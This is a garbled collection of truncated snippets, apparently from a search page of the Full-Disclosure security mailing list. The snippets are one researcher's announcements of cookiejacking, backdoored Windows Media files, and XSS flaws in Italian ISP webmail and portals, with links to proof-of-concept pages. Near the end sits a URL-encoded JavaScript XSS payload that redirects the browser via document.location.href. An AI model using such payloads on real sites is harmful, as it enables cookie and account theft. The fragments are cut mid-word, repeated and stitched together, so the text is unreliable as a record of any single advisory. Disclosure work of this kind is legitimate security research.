y cookie (http only, secure cookies, whatever the
> website)
> > of every Win user!
> >
> > If it is interesting, on my blog you can find a writeup and a couple of
> > videos.
> > https://sites.google.com/site/tentacoloviola/cookiejacking
> >
> > Regards
> >
&g
kies.
You can steal any cookie (http only, secure cookies, whatever the website)
of every Win user!
If it is interesting, on my blog you can find a writeup and a couple of
videos.
https://sites.google.com/site/tentacoloviola/cookiejacking
Regards
Rosario Val
a OWA user.
Regards,
Rosario Valotta
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
in the error page has been patched by Twitter few days after
our disclosure.
The Unicode issue is still there.
Regards
Rosario Valotta + Matteo Carlo
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
nvironment
All the details are available at:
http://sites.google.com/site/tentacoloviola/backdooring-windows-media-files
Regards
Rosario Valotta
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
scanning in an Intranet environment
All the details are available at:
http://sites.google.com/site/tentacoloviola/backdooring-windows-media-files
Regards
Rosario Valotta
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/
oglepages.com
After notification, ANSA IT department has solved the issues.
Regards,
Rosario Valotta
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
found at:
http://rosario.valotta.googlepages.com/home
Regards,
Rosario Valotta
rosario dot valotta at gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
Tiscali.it (big italian ISP) webmail is affected by a severe vulnerability;
in the email composer a user is allowed to insert a hyperlink specifying
the link URL. This feature can be used to inject malicious HTML code in the
form, allowing the execution of arbitrary code.
On the submitted URL some
POC (until not deleted) can be found at :
http://digilander.libero.it/testxss/demo/img.htm
http://digilander.libero.it/testxss/demo/img2.htm
both require you're logged in libero Community.
Greetings,
Rosario Valotta
rosario.valotta at gmail dot com
<---end-->
__
<--start-->
Following the advisory of the XSS vulnerability found on Libero.it
(italian ISP) portal,
and after the "official" response given by the portal owners which
stated that in no way user accounts would be at risk,
several other XSS vulns have been found on Libero.it/Infostrada.it
portals (b
D%70%63%65%6E%74%2B%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%69%2C%69%2B%32%29%7D%3B%0D%0A%74%6F%74%3D%75%6E%65%73%63%61%70%65%28%74%65%6D%70%29%2B%63%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%74%6F%74%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E
Greetings,
Rosario Valott
12 matches
Mail list logo